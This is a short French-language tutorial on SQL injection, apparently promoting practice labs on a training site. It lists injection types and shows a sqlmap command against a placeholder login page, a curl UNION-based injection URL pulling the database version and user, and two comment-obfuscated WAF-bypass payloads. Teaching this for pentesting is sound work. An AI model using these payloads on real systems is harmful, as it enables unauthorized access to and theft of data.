SQL Injection Guide pratique

Introduction

Les injections SQL representent 19% des vulnerabilites critiques detectees lors des pentests.

Types d'injections SQL

• Union-based : Exploite UNION pour extraire des donnees d'autres tables
• Boolean-based Blind : Reponses vrai/faux pour extraire des informations
• Time-based Blind : Delais d'execution pour confirmer la vulnerabilite
• Error-based : Messages d'erreur pour recuperer des informations

Detection avec sqlmap

sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" --dbs --batch

Exploitation Union-based

Determiner le nombre de colonnes, identifier les colonnes affichables, puis extraire les donnees.

curl "http://target.com/product.php?id=1 UNION SELECT 1,version(),user(),4,5--"

Bypass WAF

/*!50000UNION*/ SELECT 1,2,3--
/**/UNION/**/SELECT/**/1,2,3--

Conclusion

Maitrisez l'injection SQL avec une approche methodique. Pratiquez sur LabsCyber.fr avec nos labs interactifs.